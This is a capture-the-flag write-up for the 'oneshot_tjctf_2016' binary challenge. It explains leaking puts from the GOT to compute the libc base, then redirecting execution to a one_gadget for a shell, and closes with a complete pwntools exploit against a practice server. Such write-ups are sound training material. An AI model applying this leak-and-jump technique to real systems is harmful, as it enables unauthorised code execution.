oneshot_tjctf_2016
step
-
Routine inspection, 64-bit program, nx is turned on
-
Try it locally to see the general situation
-
64-bit ida loading
. The 8th line of the program will read the value of the corresponding address according to the input of the 7th line, and the 10th line will jump to the corresponding address of the input. -
The 10th line will jump according to the input address. The first thing that comes to mind is to let him jump to execute system ('/bin/sh'), but there is no existing backdoor in the program, so I thought of trying to see if one_gadget can be used.
-
Before that, we must first know the offset in the program. According to the previous analysis, line 8 will read the value of the corresponding address based on the input of line 7. We can use puts@got to leak libc at this point, so that we can calculate the offset of the program.
elf = ELF('./oneshot_tjctf_2016')
puts_got = elf.got['puts']
p.sendlineafter('Read location?',str(puts_got))
p.recvuntil('value:')
pause()
After getting the address of the puts function, the offset can be calculated and the address of one_gadget in the program can be calculated.
libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]
Ready, just enter the address of one_gadget at the input point on line 10, try one by one with 4 of them. Luckily, the first one is fine.
Full exp
from pwn import *
from LibcSearcher import *
context.log_level ='debug'
elf = ELF('./oneshot_tjctf_2016')
#p = process('./oneshot_tjctf_2016')
p = remote('node3.buuoj.cn',25203)
libc = ELF('./libc-2.23-64.so')
one_gadget = [0x45216,0x4526a,0xf02a4,0xf1147]
puts_got = elf.got['puts']
p.sendlineafter('Read location?',str(puts_got))
p.recvuntil('0x')
#pause()
puts_addr = int(p.recvuntil('\n'),16)
print hex(puts_addr)
#pause()
libcbase = puts_addr - libc.symbols['puts']
onegadget = libcbase + one_gadget[0]
p.sendline(str(onegadget))
p.interactive()
